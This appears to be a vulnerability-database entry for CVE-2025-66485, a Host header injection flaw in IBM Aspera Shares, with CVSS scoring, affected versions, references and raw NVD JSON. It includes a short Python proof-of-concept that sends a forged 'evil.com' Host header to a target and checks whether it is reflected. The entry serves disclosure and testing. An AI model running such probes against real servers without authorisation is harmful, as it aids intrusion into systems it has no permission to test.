CVE-2025-66485

Description

IBM Aspera Shares 1.9.9 through 1.11.0 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:aspera_shares:*:*:*:*:*:*:*:* - VULNERABLE

IBM Aspera Shares 1.9.9

IBM Aspera Shares 1.10.0

IBM Aspera Shares 1.11.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_host_header_injection(url):
    """
    PoC for Host Header Injection.
    Checks if the application reflects the malicious Host header.
    """
    malicious_host = "evil.com"
    headers = {
        "Host": malicious_host,
        "User-Agent": "CVE-2025-66485-Scanner"
    }

    try:
        response = requests.get(url, headers=headers, timeout=10)
        # Check if malicious host is in Location header (Redirect) or body (XSS/Reflection)
        location = response.headers.get('Location', '')
        if malicious_host in location or malicious_host in response.text:
            return f"[+] Potential vulnerability detected! Malicious host found in response."
        else:
            return "[-] No obvious reflection detected."
    except Exception as e:
        return f"[!] Error: {e}"

if __name__ == "__main__":
    target = "http://target-aspera-server.com" # Replace with actual target
    print(check_host_header_injection(target))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66485
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66485
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66485/
[4] VulDB https://vuldb.com/cve/CVE-2025-66485
[5] https://www.ibm.com/support/pages/node/7267848

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66485", "sourceIdentifier": "[email protected]", "published": "2026-04-01T23:17:02.250", "lastModified": "2026-04-03T19:56:11.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Aspera Shares 1.9.9 through 1.11.0 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-644"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:aspera_shares:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.9.9", "versionEndExcluding": "1.11.1", "matchCriteriaId": "E91033A7-CCAD-49AB-814E-73898AC951E9"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7267848", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}